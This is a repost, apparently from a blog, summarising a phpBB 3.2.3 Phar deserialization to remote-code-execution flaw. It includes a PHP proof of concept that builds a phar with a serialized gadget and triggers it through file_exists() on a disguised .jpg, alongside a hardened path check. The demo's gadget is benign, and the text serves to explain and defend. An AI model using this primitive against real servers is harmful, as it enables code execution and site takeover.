
phpBB 3.2.3: Phar Deserialization to RCE

Original article: https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/

phpBB is one of the oldest and most popular bulletin board packages. An attacker who wants to take over a board running phpBB3 will usually try to gain access to the admin control panel, whether by brute-forcing credentials, by phishing, or through XSS vulnerabilities in plugins the target site has installed. Admin access alone, however, does not give code execution: plugins cannot be installed directly from the admin panel, and no other administrative feature can be abused to run arbitrary PHP code. The vulnerability described here closes that gap. It lets an attacker with admin panel access escape the panel's intended limits, execute arbitrary PHP code on the underlying server, and from there take over the whole site.

The issue in the phpBB3 code base (roughly 300 KLOC) is a Phar deserialization vulnerability: a user-controlled path reaches a PHP filesystem function, and if that path uses the phar:// stream wrapper, PHP parses the archive and unserializes its metadata, turning a path check into an object injection. It was fixed in version 3.2.4. The RIPS static analysis (SAST) tool detected the vulnerability automatically in a scan time of 3 minutes.
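To make the primitive concrete, the following self-contained PHP script is an added illustration and is not phpBB's code or the original article's: the LogWriter gadget class, the path-check functions and the file names are all hypothetical stand-ins for a class and a sink that exist in a real target. It builds a phar whose metadata is a serialized object, shows that a plain file_exists() on a phar:// path (even one renamed to .jpg) is enough to unserialize that metadata and run the object's magic method, and contrasts it with a check that rejects stream wrappers before touching the filesystem. It needs PHP 7.x with phar.readonly disabled for the write step; PHP 8.0 stopped unserializing phar metadata on stream-wrapper access, so the gadget will not fire there.

```php
<?php
// Added illustration of the phar:// deserialization primitive (not phpBB code).
// Run with:  php -d phar.readonly=0 phar_demo.php
// Requires PHP 7.x: from PHP 8.0 the phar:// wrapper no longer unserializes
// metadata, so the __wakeup() below does not run.

// Hypothetical gadget class. In a real attack this would be an existing,
// autoloadable class of the target application whose magic method does
// something dangerous; here __wakeup() only drops a marker file so the
// demo can prove that unserialization happened.
class LogWriter {
    public $path;
    public $data;
    public function __wakeup() {
        // Runs synchronously inside unserialize(), i.e. during file_exists().
        file_put_contents($this->path, $this->data);
    }
}

// Step 1 (attacker side): build a phar whose metadata is a serialized gadget.
function build_malicious_phar(string $out, string $marker): void {
    @unlink($out);
    $phar = new Phar($out);               // filename must end in .phar to create
    $phar->startBuffering();
    $phar->addFromString('dummy.txt', 'x');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $gadget = new LogWriter();
    $gadget->path = $marker;
    $gadget->data = "metadata unserialized at " . date('c') . "\n";
    $phar->setMetadata($gadget);          // Phar serialize()s the object here
    $phar->stopBuffering();
}

// Step 2 (vulnerable pattern): a filesystem check on a user-controlled path.
// Nothing is include()d; parsing the archive to answer "does it exist?"
// is what unserializes the metadata.
function vulnerable_path_check(string $userPath): bool {
    return file_exists($userPath);
}

// Step 3 (hardened pattern): refuse any URL scheme, not just "phar://",
// since wrapper names are matched case-insensitively (PHAR://, Phar://).
function hardened_path_check(string $userPath): bool {
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $userPath)) {
        throw new InvalidArgumentException('stream wrappers are not allowed in paths');
    }
    return file_exists($userPath);
}

$tmp      = sys_get_temp_dir();
$pharFile = $tmp . '/demo.phar';
$marker   = $tmp . '/phar_demo_marker.txt';
build_malicious_phar($pharFile, $marker);

// The extension is irrelevant: a copy named like an image is still parsed
// as a phar once it is reached through the phar:// wrapper.
$disguised = $tmp . '/avatar.jpg';
copy($pharFile, $disguised);

@unlink($marker);
$payload = 'phar://' . $disguised . '/dummy.txt';
vulnerable_path_check($payload);
echo file_exists($marker)
    ? "vulnerable check: gadget ran -> " . file_get_contents($marker)
    : "vulnerable check: no deserialization (PHP >= 8.0?)\n";

@unlink($marker);
try {
    hardened_path_check($payload);
} catch (InvalidArgumentException $e) {
    echo "hardened check: rejected (" . $e->getMessage() . ")\n";
}
echo file_exists($marker) ? "hardened check: gadget ran\n" : "hardened check: gadget did not run\n";
```

The design point a reviewer should take away: the sink is not include() or eval() but any function that resolves a path (file_exists, is_dir, filesize, getimagesize, copy, and so on), and the trigger survives renaming the archive. Setting phar.readonly only blocks writing phars, not reading them, so the fix belongs at the input boundary: reject schemes in user-supplied paths, or restrict them to a known directory with realpath() before the check.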

Images and introduction quoted from: https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/

When reposting, please credit the author with a link: 波波的寂寞世界 » phpBB 3.2.3: Phar Deserialization to RCE